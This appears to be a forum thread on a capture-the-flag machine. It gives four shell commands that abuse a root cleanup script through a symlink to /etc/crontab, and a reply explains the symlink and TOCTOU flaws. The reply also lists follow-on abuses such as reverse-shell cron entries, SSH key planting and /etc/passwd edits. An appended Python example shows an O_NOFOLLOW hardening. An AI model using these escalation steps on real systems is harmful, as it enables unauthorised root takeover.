October 16, 2022 at 1:23 PM

[quote="phuongvy" pid="634257" dateline="1665461753"]
[quote="elindio67" pid="621729" dateline="1665276725"]
[quote="loge23" pid="621524" dateline="1665272154"]
For root:
[code]
rm ~/photobomb/log/photobomb.log.bak;ln -s /etc/crontab ~/photobomb/log/photobomb.log.bak
cp /etc/crontab ~/photobomb/log/photobomb.log
echo "***** root " >> ~/photobomb/log/photobomb.log
sudo /opt/cleanup.sh
[/code]
[/quote]
I was like 10 minutes reading these 4 lines before I got it. This is a very clever solution! Thanks!!
[/quote]
Can you explain it? I still cannot understand how to exploit this method.
[/quote]

It works because the cleanup script checks if 'photobomb.log' is a symbolic link but doesn't check if 'photobomb.log.old' is one. So what this method does is delete 'photobomb.log.old' and recreate it as a symbolic link pointing to '/etc/crontab'. Then the following line in the cleanup script is run with root privs:

[code]
/bin/cat log/photobomb.log > log/photobomb.log.old
[/code]

It effectively copies whatever is in 'photobomb.log' to 'photobomb.log.old' (which now points to '/etc/crontab'). And since as wizard we have write permissions to 'photobomb.log', we can plant crontab entries in there so that when the cleanup script is run it overwrites 'photobomb.log.old' and therefore overwrites '/etc/crontab'. Basically an arbitrary file write primitive. You can use it to, for example, plant a crontab entry that spawns a reverse shell, or copies and SUIDs a bash shell somewhere, or anything really. There are other ways you could abuse this without crontab too, like using it to write your public SSH key to root's 'authorized_keys', or adding entries to '/etc/passwd', and so on.

Even if it did check if 'photobomb.log.old' was a symbolic link before the overwrite, you'd still have a TOCTOU vuln because the check and the write operation aren't atomic.

In fact you have a TOCTOU here for 'photobomb.log' too, so that's another vector for elevation: between the time it does the if statement with the test that the file exists, is a nonzero size and is not a symbolic link, and the time it does the cat overwrite, you could delete 'photobomb.log' and recreate it as a symbolic link to '/root/root.txt'. That should then overwrite 'photobomb.log.old' with the root flag.
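For the defensive side of the thread above, here is an added example (not code from the box or from any poster) showing why a separate "is it a symlink?" test does not fix this class of bug and what does. The scenario is constructed entirely inside a temporary directory: a file named `protected` stands in for a root-owned target such as `/etc/crontab`, and the rotation is done two ways. `rotate_unsafe` mirrors the semantics of `cat log > log.old` (the shell redirection follows whatever `log.old` points at). `rotate_hardened` folds the symlink check into the `open()` itself with `O_NOFOLLOW`, so there is no window between check and write; the kernel refuses with `ELOOP` if the final path component is a symlink. Function and file names are illustrative assumptions, and the real fix on a production host is also to stop writing as root into a directory an unprivileged user can modify.

```python
import errno
import os
import shutil
import tempfile


def rotate_unsafe(log_path: str, old_path: str) -> None:
    """Equivalent of `/bin/cat log > log.old`: a plain open() follows a
    symlink at old_path, so the write lands on the link's target."""
    with open(log_path, "rb") as src, open(old_path, "wb") as dst:
        shutil.copyfileobj(src, dst)


def rotate_hardened(log_path: str, old_path: str) -> None:
    """Open both files with O_NOFOLLOW so the symlink check and the open
    are one atomic kernel operation (no TOCTOU window). Raises OSError
    with errno ELOOP if either final component is a symlink, and
    ValueError if the source is not a regular file."""
    src_fd = os.open(log_path, os.O_RDONLY | os.O_NOFOLLOW)
    try:
        if not os.path.isfile(f"/proc/self/fd/{src_fd}") and not _is_regular(src_fd):
            raise ValueError("source is not a regular file")
        dst_flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | os.O_NOFOLLOW
        dst_fd = os.open(old_path, dst_flags, 0o600)
    except OSError:
        os.close(src_fd)
        raise
    with os.fdopen(src_fd, "rb") as src, os.fdopen(dst_fd, "wb") as dst:
        shutil.copyfileobj(src, dst)


def _is_regular(fd: int) -> bool:
    """fstat on the already-open descriptor, so the answer applies to the
    same object we will read (unlike a stat() on the path)."""
    import stat
    return stat.S_ISREG(os.fstat(fd).st_mode)


def demo() -> dict:
    """Constructed scenario in a temp dir; 'protected' plays the role of
    a privileged file and is never anything outside that directory."""
    base = tempfile.mkdtemp()
    original = "original protected content\n"
    planted = "attacker-controlled log content\n"
    try:
        log = os.path.join(base, "photobomb.log")
        old = os.path.join(base, "photobomb.log.old")
        protected = os.path.join(base, "protected")
        with open(log, "w") as f:
            f.write(planted)
        with open(protected, "w") as f:
            f.write(original)
        # The condition the thread describes: log.old replaced by a symlink.
        os.symlink(protected, old)

        rotate_unsafe(log, old)
        with open(protected) as f:
            after_unsafe = f.read()

        # Reset the target and retry with the hardened rotation.
        with open(protected, "w") as f:
            f.write(original)
        refused = False
        try:
            rotate_hardened(log, old)
        except OSError as exc:
            refused = exc.errno == errno.ELOOP
        with open(protected) as f:
            after_hardened = f.read()

        return {
            "unsafe_overwrote_target": after_unsafe == planted,
            "hardened_refused_with_eloop": refused,
            "hardened_target_intact": after_hardened == original,
        }
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    print(demo())
```

Run it and the unsafe rotation reports that the stand-in target was overwritten while the hardened one refuses and leaves it intact. `O_NOFOLLOW` only covers the final path component, so the directory itself must not be writable by the user whose files are being rotated; otherwise a symlinked parent directory reintroduces the problem.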